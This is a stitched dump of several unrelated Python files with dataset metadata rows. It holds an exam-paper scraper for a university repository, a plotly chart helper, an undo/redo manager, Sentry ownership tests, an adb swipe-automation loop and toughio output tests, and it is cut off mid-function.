sec_li=u[3].findAll("li")
else:
sec_li=u[2].findAll("li")
p=PrettyTable(["S.No","Title"])
for j in range(len(sec_li)):
p.add_row([j+1,sec_li[j].a.text.strip()])
print(p)
ch3=int(input("Enter your choice "))
while((ch3>len(sec_li)) or (ch3<0)):
ch3=int(input("Enter your choice "))
url="http://dspace.amritanet.edu:8080/"
url+=sec_li[ch3-1].a["href"]
third_page=requests.get(url)
third_soup=BeautifulSoup(third_page.content,'html.parser')
u3_div=third_soup.findAll("div",class_="ds-static-div secondary recent-submission")
third_div=u3_div[0].a.text.strip()
third_li=u3_div[0].findAll("li")
m=PrettyTable(["S.No","Title"])
m.add_row([1,third_div])
print(m)
ch4=int(input("Enter your choice "))
while((ch4>len(third_li)) or (ch4<0)):
ch4=int(input("Enter your choice "))
url="http://dspace.amritanet.edu:8080/"
url+=third_li[ch4-1].a["href"]
fourth_page=requests.get(url)
fourth_soup=BeautifulSoup(fourth_page.content,'html.parser')
u4_div=fourth_soup.findAll("div",class_="file-metadata")
v=PrettyTable(["S.No","Subjects"])
u4_temp=[]
mod_u4_temp=[]
for i in range(len(u4_div)):
u4_temp.append((u4_div[i].findAll("span")[1].text))
for j in range(len(u4_temp)):
mod_u4_temp=u4_temp[j].split(",")
v.add_row([j+1,mod_u4_temp[0]])
print(v)
last_ch=int(input("Enter your choice "))
last_div=fourth_soup.findAll("div",class_="file-link")
while((last_ch>len(last_div)) or (last_ch<0)):
last_ch=int(input("Enter your choice "))
url_last="http://dspace.amritanet.edu:8080"
url_last+=last_div[last_ch-1].a["href"]
print("All the very best for your exams :)")
sleep(1)
download=int(input("Enter 1 to download or 0 to open in browser "))
while(download!=1 and download!=0):
download=int(input("Enter 1 to download or 0 to open in browser "))
print("Give me just a minute :)")
if(download==1):
response = requests.get(url_last)
spliturl=url_last.split("/")
namewithext=spliturl[-1]
name_reduced=namewithext.split("?")
save=name_reduced[0]
#save+=".pdf"
with open(save,'wb') as f:
f.write(response.content)
print("The Qp is waiting for you at "+os.getcwd())
else:
print("The Qp is waiting for you :)")
webbrowser.open_new(url_last)
cont=int(input("Enter 1 to view another Qp or 0 to exit "))
| 29.898438
| 85
| 0.679906
|
import os
import webbrowser
import time
import random
import requests
from bs4 import BeautifulSoup
from prettytable import PrettyTable
from time import sleep
cont = 1
print("Welcome to Qp Bank !")
sleep(1)
print("Crafted with love by Mathan.S")
sleep(1)
print("Ensure your connectivity to Amrita Wifi for smooth experience :)")
while(cont==1):
url="http://dspace.amritanet.edu:8080/xmlui/handle/123456789/150"
page=requests.get(url)
soup=BeautifulSoup(page.content,'html.parser')
div=soup.div
main_div=soup.find(id="aspect_artifactbrowser_CommunityViewer_div_community-view")
t=PrettyTable(["S.No","Attribute"])
main_list_item=main_div.ul
items=main_list_item.findAll("li")
for i in range(len(items)):
t.add_row([i+1,items[i].a.text.strip()])
print(t)
ch=int(input("Enter your Semester "))
while((ch>len(items)) or (ch<0)):
ch=int(input("Enter your Semester "))
url="http://dspace.amritanet.edu:8080"
url+=items[ch-1].a["href"]
print("Give me just a minute...")
sec_page=requests.get(url)
sec_soup=BeautifulSoup(sec_page.content,'html.parser')
u=sec_soup.findAll("ul")
if ch<=6:
sec_li=u[3].findAll("li")
else:
sec_li=u[2].findAll("li")
p=PrettyTable(["S.No","Title"])
for j in range(len(sec_li)):
p.add_row([j+1,sec_li[j].a.text.strip()])
print(p)
ch3=int(input("Enter your choice "))
while((ch3>len(sec_li)) or (ch3<0)):
ch3=int(input("Enter your choice "))
url="http://dspace.amritanet.edu:8080/"
url+=sec_li[ch3-1].a["href"]
third_page=requests.get(url)
third_soup=BeautifulSoup(third_page.content,'html.parser')
u3_div=third_soup.findAll("div",class_="ds-static-div secondary recent-submission")
third_div=u3_div[0].a.text.strip()
third_li=u3_div[0].findAll("li")
m=PrettyTable(["S.No","Title"])
m.add_row([1,third_div])
print(m)
ch4=int(input("Enter your choice "))
while((ch4>len(third_li)) or (ch4<0)):
ch4=int(input("Enter your choice "))
url="http://dspace.amritanet.edu:8080/"
url+=third_li[ch4-1].a["href"]
fourth_page=requests.get(url)
fourth_soup=BeautifulSoup(fourth_page.content,'html.parser')
u4_div=fourth_soup.findAll("div",class_="file-metadata")
v=PrettyTable(["S.No","Subjects"])
u4_temp=[]
mod_u4_temp=[]
for i in range(len(u4_div)):
u4_temp.append((u4_div[i].findAll("span")[1].text))
for j in range(len(u4_temp)):
mod_u4_temp=u4_temp[j].split(",")
v.add_row([j+1,mod_u4_temp[0]])
print(v)
last_ch=int(input("Enter your choice "))
last_div=fourth_soup.findAll("div",class_="file-link")
while((last_ch>len(last_div)) or (last_ch<0)):
last_ch=int(input("Enter your choice "))
url_last="http://dspace.amritanet.edu:8080"
url_last+=last_div[last_ch-1].a["href"]
print("All the very best for your exams :)")
sleep(1)
download=int(input("Enter 1 to download or 0 to open in browser "))
while(download!=1 and download!=0):
download=int(input("Enter 1 to download or 0 to open in browser "))
print("Give me just a minute :)")
if(download==1):
response = requests.get(url_last)
spliturl=url_last.split("/")
namewithext=spliturl[-1]
name_reduced=namewithext.split("?")
save=name_reduced[0]
with open(save,'wb') as f:
f.write(response.content)
print("The Qp is waiting for you at "+os.getcwd())
else:
print("The Qp is waiting for you :)")
webbrowser.open_new(url_last)
cont=int(input("Enter 1 to view another Qp or 0 to exit "))
| true
| true
|
f704fb25ca1ed4fdc84a58c5353bd993763a5b53
| 820
|
py
|
Python
|
amulet/api/history.py
|
Podshot/Amulet-Core
|
678a722daa5e4487d193a7e947ccceacac325fd2
|
[
"MIT"
] | null | null | null |
amulet/api/history.py
|
Podshot/Amulet-Core
|
678a722daa5e4487d193a7e947ccceacac325fd2
|
[
"MIT"
] | null | null | null |
amulet/api/history.py
|
Podshot/Amulet-Core
|
678a722daa5e4487d193a7e947ccceacac325fd2
|
[
"MIT"
] | null | null | null |
from __future__ import annotations
from .data_structures import Stack
from .operation import Operation
class HistoryManager:
def __init__(self):
self.undo_stack: Stack[Operation] = Stack()
self.redo_stack: Stack[Operation] = Stack()
def add_operation(self, operation_instance: Operation):
self.undo_stack.append(operation_instance)
def undo(self) -> Operation:
operation_to_undo = self.undo_stack.pop()
self.redo_stack.append(operation_to_undo)
return operation_to_undo
def redo(self) -> Operation:
operation_to_redo = self.redo_stack.pop()
self.undo_stack.append(operation_to_redo)
return operation_to_redo
def __contains__(self, item):
if isinstance(item, Operation):
return item in self.undo_stack
| 29.285714
| 59
| 0.702439
|
from __future__ import annotations
from .data_structures import Stack
from .operation import Operation
class HistoryManager:
def __init__(self):
self.undo_stack: Stack[Operation] = Stack()
self.redo_stack: Stack[Operation] = Stack()
def add_operation(self, operation_instance: Operation):
self.undo_stack.append(operation_instance)
def undo(self) -> Operation:
operation_to_undo = self.undo_stack.pop()
self.redo_stack.append(operation_to_undo)
return operation_to_undo
def redo(self) -> Operation:
operation_to_redo = self.redo_stack.pop()
self.undo_stack.append(operation_to_redo)
return operation_to_redo
def __contains__(self, item):
if isinstance(item, Operation):
return item in self.undo_stack
| true
| true
|
f704fbc9f2528b864b8b22eb0ac9981a1560e438
| 5,522
|
py
|
Python
|
mainapp/webapp/figures/linechart.py
|
thomashusebo/inf219-visualize-2d-sensor-data
|
87572c46579887fb212fdfb6f413e271edc77bfe
|
[
"MIT"
] | null | null | null |
mainapp/webapp/figures/linechart.py
|
thomashusebo/inf219-visualize-2d-sensor-data
|
87572c46579887fb212fdfb6f413e271edc77bfe
|
[
"MIT"
] | 43
|
2020-02-14T16:15:15.000Z
|
2020-07-14T12:05:09.000Z
|
mainapp/webapp/figures/linechart.py
|
thomashusebo/inf219-visualize-2d-sensor-data
|
87572c46579887fb212fdfb6f413e271edc77bfe
|
[
"MIT"
] | null | null | null |
import plotly.graph_objects as go
from mainapp.app_settings import cell_length_meter
def getLineChart(
data,
timestamp,
coordinates,
colorScale,
timeline,
color_range,
dragmode=False,
quick_select_range=True,
calibration_time=None,
show_legend=False):
if len(data) < 1: return {
'data': [],
'layout': go.Layout(title=go.layout.Title(text='No data found'))
}
x = data.iloc[:, 0].values
linechart_fig = go.Figure()
means = data.iloc[:, 1:].transpose().mean().transpose()
var = data.iloc[:, 1:].transpose().std().transpose()
# Add continuous error bars to the plot
'''error_colors = ['#d9d9d9', '#bdbdbd', '#969696']
for i in reversed(range(1, 4)):
fill_color = error_colors[i-1]
if data.shape[1] > 2:
linechart_fig.add_trace(go.Scatter(
x=x,
y=means - i * var,
mode='lines',
line=dict(width=1, color='black'),
showlegend=False
))
linechart_fig.add_trace(go.Scatter(
name='{} sigma'.format(i),
x=x,
y=means + i * var,
mode='lines',
marker=dict(color="#444"),
line=dict(width=1, color='black'),
fillcolor=fill_color,
fill='tonexty'))'''
# Add individual traces to the plot
ys = data.shape[1]
for y in range(1, ys):
coord = coordinates[y-1]
y = data.iloc[:, y].values
linechart_fig.add_trace(go.Scatter(
name='[{:2d},{:2d}]'.format(coord['x'], coord['y']),
x=x,
y=y,
mode='lines+markers',
line=dict(
width=1,
color='#292929'),
marker=dict(
size=2,
color='#292929'),
showlegend=show_legend
))
# Add central values to the plot
'''if data.shape[1] > 1:
if data.shape[1] == 2:
trace_name = '[{:d},{:d}]'.format(coordinates[0]['x'], coordinates[0]['y'])
else:
trace_name = 'Average'
linechart_fig.add_trace(go.Scatter(
name=trace_name,
x=x,
y=means,
mode='lines+markers',
line=dict(
color='#292929',
width=1,
),
marker=dict(
color='#292929',
size=3,
),
showlegend=True,
))'''
# Add vertical line representing selected timestamp
linechart_fig.add_shape(
# Line Vertical
dict(
name='selected timestamp',
type="line",
yref='paper',
x0=timestamp,
y0=0,
x1=timestamp,
y1=1,
line=dict(
color="black",
width=5
),
))
# Add vertical line representing selected calibration
if calibration_time is not None:
linechart_fig.add_shape(
# Line Vertical
dict(
name='calibration time',
type="line",
yref='paper',
x0=calibration_time,
y0=0,
x1=calibration_time,
y1=1,
line=dict(
color="green",
width=5
),
))
#Add colorbar to plot
if color_range['min'] is not None and color_range['max'] is not None:
min = color_range['min']
max = color_range['max']
width_of_line = (color_range['max'] - color_range['min']) / len(colorScale)
for i in range(len(colorScale)):
linechart_fig.add_shape(
dict(
type="rect",
xref="paper",
yref="y",
x0=0,
y0= min + i*width_of_line, #if i > 0 else 0 if min <= max else 12000,
x1=1,
y1=min + (i+1)*width_of_line, #if i < len(colorScale)-1 else 12000 if min <= max else 0,
fillcolor=colorScale[i][1],
opacity=0.6,
layer="below",
line_width=0,
)
)
range_selector = None
if quick_select_range:
range_selector = dict(
buttons=list([
dict(count=1, label="1m", step="minute", stepmode="backward"),
dict(count=1, label="1h", step="hour", stepmode="backward"),
dict(count=1, label="1d", step="day", stepmode="backward"),
dict(count=7, label="1w", step="day", stepmode="backward")
])
)
linechart_fig.update_layout(
xaxis=dict(
range=[timeline['start'], timeline['end']],
type="date",
linecolor='black',
gridcolor='LightGrey',
rangeselector=range_selector
),
yaxis=dict(
title='Resistivity (Ohm)',
rangemode='tozero',
linecolor='black',
gridcolor='LightGrey',
fixedrange=True
),
margin=dict(
l=15,
r=0,
t=30,
b=5,
pad=0
),
plot_bgcolor='white',
dragmode=dragmode,
height=250,
)
return linechart_fig
| 29.216931
| 108
| 0.458892
|
import plotly.graph_objects as go
from mainapp.app_settings import cell_length_meter
def getLineChart(
data,
timestamp,
coordinates,
colorScale,
timeline,
color_range,
dragmode=False,
quick_select_range=True,
calibration_time=None,
show_legend=False):
if len(data) < 1: return {
'data': [],
'layout': go.Layout(title=go.layout.Title(text='No data found'))
}
x = data.iloc[:, 0].values
linechart_fig = go.Figure()
means = data.iloc[:, 1:].transpose().mean().transpose()
var = data.iloc[:, 1:].transpose().std().transpose()
ys = data.shape[1]
for y in range(1, ys):
coord = coordinates[y-1]
y = data.iloc[:, y].values
linechart_fig.add_trace(go.Scatter(
name='[{:2d},{:2d}]'.format(coord['x'], coord['y']),
x=x,
y=y,
mode='lines+markers',
line=dict(
width=1,
color='#292929'),
marker=dict(
size=2,
color='#292929'),
showlegend=show_legend
))
linechart_fig.add_shape(
dict(
name='selected timestamp',
type="line",
yref='paper',
x0=timestamp,
y0=0,
x1=timestamp,
y1=1,
line=dict(
color="black",
width=5
),
))
if calibration_time is not None:
linechart_fig.add_shape(
dict(
name='calibration time',
type="line",
yref='paper',
x0=calibration_time,
y0=0,
x1=calibration_time,
y1=1,
line=dict(
color="green",
width=5
),
))
if color_range['min'] is not None and color_range['max'] is not None:
min = color_range['min']
max = color_range['max']
width_of_line = (color_range['max'] - color_range['min']) / len(colorScale)
for i in range(len(colorScale)):
linechart_fig.add_shape(
dict(
type="rect",
xref="paper",
yref="y",
x0=0,
y0= min + i*width_of_line,
x1=1,
y1=min + (i+1)*width_of_line,
fillcolor=colorScale[i][1],
opacity=0.6,
layer="below",
line_width=0,
)
)
range_selector = None
if quick_select_range:
range_selector = dict(
buttons=list([
dict(count=1, label="1m", step="minute", stepmode="backward"),
dict(count=1, label="1h", step="hour", stepmode="backward"),
dict(count=1, label="1d", step="day", stepmode="backward"),
dict(count=7, label="1w", step="day", stepmode="backward")
])
)
linechart_fig.update_layout(
xaxis=dict(
range=[timeline['start'], timeline['end']],
type="date",
linecolor='black',
gridcolor='LightGrey',
rangeselector=range_selector
),
yaxis=dict(
title='Resistivity (Ohm)',
rangemode='tozero',
linecolor='black',
gridcolor='LightGrey',
fixedrange=True
),
margin=dict(
l=15,
r=0,
t=30,
b=5,
pad=0
),
plot_bgcolor='white',
dragmode=dragmode,
height=250,
)
return linechart_fig
| true
| true
|
f704fc4963a514b11f2efd68c503b1d00784b219
| 5,508
|
py
|
Python
|
tests/sentry/models/test_projectownership.py
|
AlexWayfer/sentry
|
ef935cda2b2e960bd602fda590540882d1b0712d
|
[
"BSD-3-Clause"
] | 1
|
2022-02-09T22:56:49.000Z
|
2022-02-09T22:56:49.000Z
|
tests/sentry/models/test_projectownership.py
|
AlexWayfer/sentry
|
ef935cda2b2e960bd602fda590540882d1b0712d
|
[
"BSD-3-Clause"
] | 6
|
2018-10-19T10:04:23.000Z
|
2019-12-09T20:29:12.000Z
|
tests/sentry/models/test_projectownership.py
|
AlexWayfer/sentry
|
ef935cda2b2e960bd602fda590540882d1b0712d
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import absolute_import
from sentry.testutils import TestCase
from sentry.api.fields.actor import Actor
from sentry.models import ProjectOwnership, User, Team
from sentry.models.projectownership import resolve_actors
from sentry.ownership.grammar import Rule, Owner, Matcher, dump_schema
class ProjectOwnershipTestCase(TestCase):
def assert_ownership_equals(self, o1, o2):
assert (
sorted(o1[0]) == sorted(o2[0]) and
sorted(o1[1]) == sorted(o2[1])
)
def test_get_owners_default(self):
assert ProjectOwnership.get_owners(self.project.id, {}) == (ProjectOwnership.Everyone, None)
def test_get_owners_basic(self):
rule_a = Rule(
Matcher('path', '*.py'), [
Owner('team', self.team.slug),
])
rule_b = Rule(
Matcher('path', 'src/*'), [
Owner('user', self.user.email),
])
ProjectOwnership.objects.create(
project_id=self.project.id,
schema=dump_schema([rule_a, rule_b]),
fallthrough=True,
)
# No data matches
assert ProjectOwnership.get_owners(self.project.id, {}) == (ProjectOwnership.Everyone, None)
# Match only rule_a
self.assert_ownership_equals(ProjectOwnership.get_owners(
self.project.id, {
'sentry.interfaces.Stacktrace': {
'frames': [{
'filename': 'foo.py',
}]
}
}
), ([Actor(self.team.id, Team)], [rule_a]))
# Match only rule_b
self.assert_ownership_equals(ProjectOwnership.get_owners(
self.project.id, {
'sentry.interfaces.Stacktrace': {
'frames': [{
'filename': 'src/thing.txt',
}]
}
}
), ([Actor(self.user.id, User)], [rule_b]))
# Matches both rule_a and rule_b
self.assert_ownership_equals(ProjectOwnership.get_owners(
self.project.id, {
'sentry.interfaces.Stacktrace': {
'frames': [{
'filename': 'src/foo.py',
}]
}
}
), ([Actor(self.user.id, User), Actor(self.team.id, Team)], [rule_a, rule_b]))
assert ProjectOwnership.get_owners(
self.project.id, {
'sentry.interfaces.Stacktrace': {
'frames': [{
'filename': 'xxxx',
}]
}
}
) == (ProjectOwnership.Everyone, None)
# When fallthrough = False, we don't implicitly assign to Everyone
ProjectOwnership.objects.filter(
project_id=self.project.id,
).update(fallthrough=False)
assert ProjectOwnership.get_owners(
self.project.id, {
'sentry.interfaces.Stacktrace': {
'frames': [{
'filename': 'xxxx',
}]
}
}
) == ([], None)
class ResolveActorsTestCase(TestCase):
def test_no_actors(self):
assert resolve_actors([], self.project.id) == {}
def test_basic(self):
owners = [
Owner('user', self.user.email),
Owner('team', self.team.slug),
]
assert resolve_actors(owners, self.project.id) == {
owners[0]: Actor(self.user.id, User),
owners[1]: Actor(self.team.id, Team),
}
def test_teams(self):
# Normal team
owner1 = Owner('team', self.team.slug)
actor1 = Actor(self.team.id, Team)
# Team that doesn't exist
owner2 = Owner('team', 'nope')
actor2 = None
# A team that's not ours
otherteam = Team.objects.exclude(projectteam__project_id=self.project.id)[0]
owner3 = Owner('team', otherteam.slug)
actor3 = None
assert resolve_actors([owner1, owner2, owner3], self.project.id) == {
owner1: actor1,
owner2: actor2,
owner3: actor3,
}
def test_users(self):
# Normal user
owner1 = Owner('user', self.user.email)
actor1 = Actor(self.user.id, User)
# An extra secondary email
email1 = self.create_useremail(self.user, None, is_verified=True).email
owner2 = Owner('user', email1)
actor2 = actor1 # They map to the same user since it's just a secondary email
# Another secondary email, that isn't verified
email2 = self.create_useremail(self.user, None, is_verified=False).email
owner3 = Owner('user', email2)
# Intentionally allow unverified emails
# actor3 = None
actor3 = actor1
# An entirely unknown user
owner4 = Owner('user', 'nope')
actor4 = None
# A user that doesn't belong with us
otheruser = self.create_user()
owner5 = Owner('user', otheruser.email)
actor5 = None
# Case-insensitive for user
owner6 = Owner('user', self.user.email.upper())
actor6 = actor1
assert resolve_actors([owner1, owner2, owner3, owner4, owner5, owner6], self.project.id) == {
owner1: actor1,
owner2: actor2,
owner3: actor3,
owner4: actor4,
owner5: actor5,
owner6: actor6,
}
| 32.210526
| 101
| 0.535766
|
from __future__ import absolute_import
from sentry.testutils import TestCase
from sentry.api.fields.actor import Actor
from sentry.models import ProjectOwnership, User, Team
from sentry.models.projectownership import resolve_actors
from sentry.ownership.grammar import Rule, Owner, Matcher, dump_schema
class ProjectOwnershipTestCase(TestCase):
def assert_ownership_equals(self, o1, o2):
assert (
sorted(o1[0]) == sorted(o2[0]) and
sorted(o1[1]) == sorted(o2[1])
)
def test_get_owners_default(self):
assert ProjectOwnership.get_owners(self.project.id, {}) == (ProjectOwnership.Everyone, None)
def test_get_owners_basic(self):
rule_a = Rule(
Matcher('path', '*.py'), [
Owner('team', self.team.slug),
])
rule_b = Rule(
Matcher('path', 'src/*'), [
Owner('user', self.user.email),
])
ProjectOwnership.objects.create(
project_id=self.project.id,
schema=dump_schema([rule_a, rule_b]),
fallthrough=True,
)
assert ProjectOwnership.get_owners(self.project.id, {}) == (ProjectOwnership.Everyone, None)
self.assert_ownership_equals(ProjectOwnership.get_owners(
self.project.id, {
'sentry.interfaces.Stacktrace': {
'frames': [{
'filename': 'foo.py',
}]
}
}
), ([Actor(self.team.id, Team)], [rule_a]))
self.assert_ownership_equals(ProjectOwnership.get_owners(
self.project.id, {
'sentry.interfaces.Stacktrace': {
'frames': [{
'filename': 'src/thing.txt',
}]
}
}
), ([Actor(self.user.id, User)], [rule_b]))
self.assert_ownership_equals(ProjectOwnership.get_owners(
self.project.id, {
'sentry.interfaces.Stacktrace': {
'frames': [{
'filename': 'src/foo.py',
}]
}
}
), ([Actor(self.user.id, User), Actor(self.team.id, Team)], [rule_a, rule_b]))
assert ProjectOwnership.get_owners(
self.project.id, {
'sentry.interfaces.Stacktrace': {
'frames': [{
'filename': 'xxxx',
}]
}
}
) == (ProjectOwnership.Everyone, None)
ProjectOwnership.objects.filter(
project_id=self.project.id,
).update(fallthrough=False)
assert ProjectOwnership.get_owners(
self.project.id, {
'sentry.interfaces.Stacktrace': {
'frames': [{
'filename': 'xxxx',
}]
}
}
) == ([], None)
class ResolveActorsTestCase(TestCase):
def test_no_actors(self):
assert resolve_actors([], self.project.id) == {}
def test_basic(self):
owners = [
Owner('user', self.user.email),
Owner('team', self.team.slug),
]
assert resolve_actors(owners, self.project.id) == {
owners[0]: Actor(self.user.id, User),
owners[1]: Actor(self.team.id, Team),
}
def test_teams(self):
# Normal team
owner1 = Owner('team', self.team.slug)
actor1 = Actor(self.team.id, Team)
# Team that doesn't exist
owner2 = Owner('team', 'nope')
actor2 = None
otherteam = Team.objects.exclude(projectteam__project_id=self.project.id)[0]
owner3 = Owner('team', otherteam.slug)
actor3 = None
assert resolve_actors([owner1, owner2, owner3], self.project.id) == {
owner1: actor1,
owner2: actor2,
owner3: actor3,
}
def test_users(self):
# Normal user
owner1 = Owner('user', self.user.email)
actor1 = Actor(self.user.id, User)
# An extra secondary email
email1 = self.create_useremail(self.user, None, is_verified=True).email
owner2 = Owner('user', email1)
actor2 = actor1 # They map to the same user since it's just a secondary email
email2 = self.create_useremail(self.user, None, is_verified=False).email
owner3 = Owner('user', email2)
# Intentionally allow unverified emails
# actor3 = None
actor3 = actor1
# An entirely unknown user
owner4 = Owner('user', 'nope')
actor4 = None
# A user that doesn't belong with us
otheruser = self.create_user()
owner5 = Owner('user', otheruser.email)
actor5 = None
owner6 = Owner('user', self.user.email.upper())
actor6 = actor1
assert resolve_actors([owner1, owner2, owner3, owner4, owner5, owner6], self.project.id) == {
owner1: actor1,
owner2: actor2,
owner3: actor3,
owner4: actor4,
owner5: actor5,
owner6: actor6,
}
| true
| true
|
f704fc910bd0b1ded2564c2c436dd36c7bac1bc0
| 609
|
py
|
Python
|
Redmi_note9/PUCO_Bob/day_start/show_test_0.py
|
Lezaza/hotpoor_autoclick_xhs
|
52eafad8cce59353a9de5bf6e488e8a2602e5536
|
[
"Apache-2.0"
] | 1
|
2021-12-21T10:42:46.000Z
|
2021-12-21T10:42:46.000Z
|
Redmi_note9/PUCO_Bob/day_start/show_test_0.py
|
2218084076/hotpoor_autoclick_xhs
|
a52446ba691ac19e43410a465dc63f940c0e444d
|
[
"Apache-2.0"
] | 2
|
2021-11-03T11:36:44.000Z
|
2021-11-05T07:58:13.000Z
|
Redmi_note9/PUCO_Bob/day_start/show_test_0.py
|
2218084076/hotpoor_autoclick_xhs
|
a52446ba691ac19e43410a465dc63f940c0e444d
|
[
"Apache-2.0"
] | 1
|
2021-10-09T10:28:57.000Z
|
2021-10-09T10:28:57.000Z
|
import os
import time
# os.system("adb shell monkey -p com.xingin.xhs -c android.intent.category.LAUNCHER 1")
# os.system("sleep 4")
# os.system("adb shell input tap 1000 150")
# os.system("sleep 2")
# os.system("adb shell input text PUCO")
# os.system("sleep 2")
# os.system("adb shell input tap 1000 150")
# os.system("adb shell input swipe 340 800 340 500 1000")
for i in range(0,50):
os.system("adb shell input swipe 340 1200 340 400 1000")
os.system("adb shell input swipe 340 600 340 1800 1000")
time.sleep(1)
os.system("adb shell input swipe 340 1400 340 200 1000")
time.sleep(2)
| 32.052632
| 87
| 0.692939
|
import os
import time
for i in range(0,50):
os.system("adb shell input swipe 340 1200 340 400 1000")
os.system("adb shell input swipe 340 600 340 1800 1000")
time.sleep(1)
os.system("adb shell input swipe 340 1400 340 200 1000")
time.sleep(2)
| true
| true
|
f704ff4f170ca5bfc8ac19a642a71a7b7ae80975
| 4,955
|
py
|
Python
|
test/test_output.py
|
keurfonluu/toughio
|
1db0600ee5ad1abb5ca858c81c8ac5226c9dbb4f
|
[
"BSD-3-Clause-LBNL"
] | 21
|
2020-03-05T20:03:58.000Z
|
2022-03-14T23:17:42.000Z
|
test/test_output.py
|
keurfonluu/toughio
|
1db0600ee5ad1abb5ca858c81c8ac5226c9dbb4f
|
[
"BSD-3-Clause-LBNL"
] | 60
|
2020-02-14T22:53:01.000Z
|
2022-03-26T07:24:19.000Z
|
test/test_output.py
|
keurfonluu/toughio
|
1db0600ee5ad1abb5ca858c81c8ac5226c9dbb4f
|
[
"BSD-3-Clause-LBNL"
] | 6
|
2020-02-28T08:15:36.000Z
|
2022-03-13T23:26:24.000Z
|
import os
import helpers
import numpy
import pytest
import toughio
write_read = lambda output, writer_kws, reader_kws: helpers.write_read(
"output",
output,
toughio.write_output,
toughio.read_output,
writer_kws=writer_kws,
reader_kws=reader_kws,
)
@pytest.mark.parametrize(
"filename, data_ref",
[
(
"FOFT_A1912.csv",
{
"TIME": 4.393722000e9,
"PRES": 1.8740899675005e8,
"TEMP": 720.0,
"SAT_G": 0.0,
"SAT_L": 24.0,
},
),
(
"FOFT_A1912_T2.csv",
{
"TIME": 3.06639400e9,
"PRES": 1.83000721e8,
"TEMP": 660.0,
"SAT_G": 0.0,
"SAT_L": 22.0,
},
),
(
"GOFT_A1162.csv",
{"TIME": 4.393722000e9, "GEN": -30.0, "ENTG": 1.528048035348e7, "PWB": 0.0},
),
(
"GOFT_A1162_T2.csv",
{"TIME": 3.06639400e9, "GEN": -27.5, "ENTG": 1.40141971e7, "PWB": 0.0},
),
],
)
def test_history(filename, data_ref):
this_dir = os.path.dirname(os.path.abspath(__file__))
filename = os.path.join(this_dir, "support_files", "outputs", filename)
data = toughio.read_history(filename)
for k, v in data_ref.items():
assert numpy.allclose(v, data[k].sum())
@pytest.mark.parametrize(
"filename, filename_ref",
[
("OUTPUT_ELEME.csv", "SAVE.out"),
("OUTPUT_ELEME.tec", "SAVE.out"),
("OUTPUT_ELEME_PETRASIM.csv", "SAVE.out"),
("OUTPUT.out", "SAVE.out"),
("OUTPUT_6.out", "SAVE_6.out"),
],
)
def test_output_eleme(filename, filename_ref):
this_dir = os.path.dirname(os.path.abspath(__file__))
filename = os.path.join(this_dir, "support_files", "outputs", filename)
outputs = toughio.read_output(filename)
filename = os.path.join(this_dir, "support_files", "outputs", filename_ref)
save = toughio.read_output(filename)
assert len(outputs) == 5
times_ref = [
0.2592000e08,
0.3155800e08,
0.1577900e09,
0.3155800e09,
0.7889400e09,
]
keys_ref = ["POR", "PRES", "SAT_G", "TEMP", "X", "Y", "Z"]
for output, time_ref in zip(outputs, times_ref):
assert time_ref == output.time
assert (
save.labels.tolist() == output.labels.tolist()
if output.format in {"csv", "petrasim", "tough"}
else output.labels == None
)
if output.format != "tough":
assert keys_ref == sorted(list(output.data.keys()))
assert numpy.allclose(save.data["X1"], outputs[-1].data["PRES"])
assert numpy.allclose(save.data["X2"], outputs[-1].data["TEMP"], atol=0.1)
@pytest.mark.parametrize(
"filename",
["OUTPUT_CONNE.csv", "OUTPUT.out", "OUTPUT_6.out"],
)
def test_output_conne(filename):
this_dir = os.path.dirname(os.path.abspath(__file__))
filename = os.path.join(this_dir, "support_files", "outputs", filename)
outputs = toughio.read_output(filename, connection=True)
times_ref = [
0.2592000e08,
0.3155800e08,
0.1577900e09,
0.3155800e09,
0.7889400e09,
]
data_ref = [
52542.0,
52475.0,
51146.0,
49600.0,
45623.0,
]
for output, time_ref, data in zip(outputs, times_ref, data_ref):
assert time_ref == output.time
assert (
len(set("".join(labels) for labels in output.labels))
== output.data["HEAT"].size
)
assert numpy.allclose(data, numpy.abs(output.data["HEAT"]).mean(), atol=1.0)
@pytest.mark.parametrize(
"output_ref, file_format",
[
(helpers.output_eleme, "csv"),
(helpers.output_eleme[0], "csv"),
(helpers.output_eleme, "petrasim"),
(helpers.output_eleme[0], "petrasim"),
(helpers.output_eleme, "tecplot"),
(helpers.output_eleme[0], "tecplot"),
(helpers.output_conne, "csv"),
(helpers.output_conne[0], "csv"),
],
)
def test_output(output_ref, file_format):
output = write_read(
output=output_ref,
writer_kws={"file_format": file_format},
reader_kws={},
)
output_ref = output_ref if isinstance(output_ref, list) else [output_ref]
for out_ref, out in zip(output_ref, output):
helpers.allclose_output(out_ref, out)
def test_save():
this_dir = os.path.dirname(os.path.abspath(__file__))
filename = os.path.join(this_dir, "support_files", "outputs", "SAVE.out")
save = toughio.read_output(filename)
x_ref = [6.35804123e05, 1.42894499e02, 9.91868799e-01]
assert numpy.allclose(
x_ref, numpy.mean([save.data["X1"], save.data["X2"], save.data["X3"]], axis=1)
)
assert numpy.allclose(0.01, save.data["porosity"].mean())
assert "userx" not in save.data.keys()
| 28.641618
| 88
| 0.574975
|
import os
import helpers
import numpy
import pytest
import toughio
write_read = lambda output, writer_kws, reader_kws: helpers.write_read(
"output",
output,
toughio.write_output,
toughio.read_output,
writer_kws=writer_kws,
reader_kws=reader_kws,
)
@pytest.mark.parametrize(
"filename, data_ref",
[
(
"FOFT_A1912.csv",
{
"TIME": 4.393722000e9,
"PRES": 1.8740899675005e8,
"TEMP": 720.0,
"SAT_G": 0.0,
"SAT_L": 24.0,
},
),
(
"FOFT_A1912_T2.csv",
{
"TIME": 3.06639400e9,
"PRES": 1.83000721e8,
"TEMP": 660.0,
"SAT_G": 0.0,
"SAT_L": 22.0,
},
),
(
"GOFT_A1162.csv",
{"TIME": 4.393722000e9, "GEN": -30.0, "ENTG": 1.528048035348e7, "PWB": 0.0},
),
(
"GOFT_A1162_T2.csv",
{"TIME": 3.06639400e9, "GEN": -27.5, "ENTG": 1.40141971e7, "PWB": 0.0},
),
],
)
def test_history(filename, data_ref):
this_dir = os.path.dirname(os.path.abspath(__file__))
filename = os.path.join(this_dir, "support_files", "outputs", filename)
data = toughio.read_history(filename)
for k, v in data_ref.items():
assert numpy.allclose(v, data[k].sum())
@pytest.mark.parametrize(
"filename, filename_ref",
[
("OUTPUT_ELEME.csv", "SAVE.out"),
("OUTPUT_ELEME.tec", "SAVE.out"),
("OUTPUT_ELEME_PETRASIM.csv", "SAVE.out"),
("OUTPUT.out", "SAVE.out"),
("OUTPUT_6.out", "SAVE_6.out"),
],
)
def test_output_eleme(filename, filename_ref):
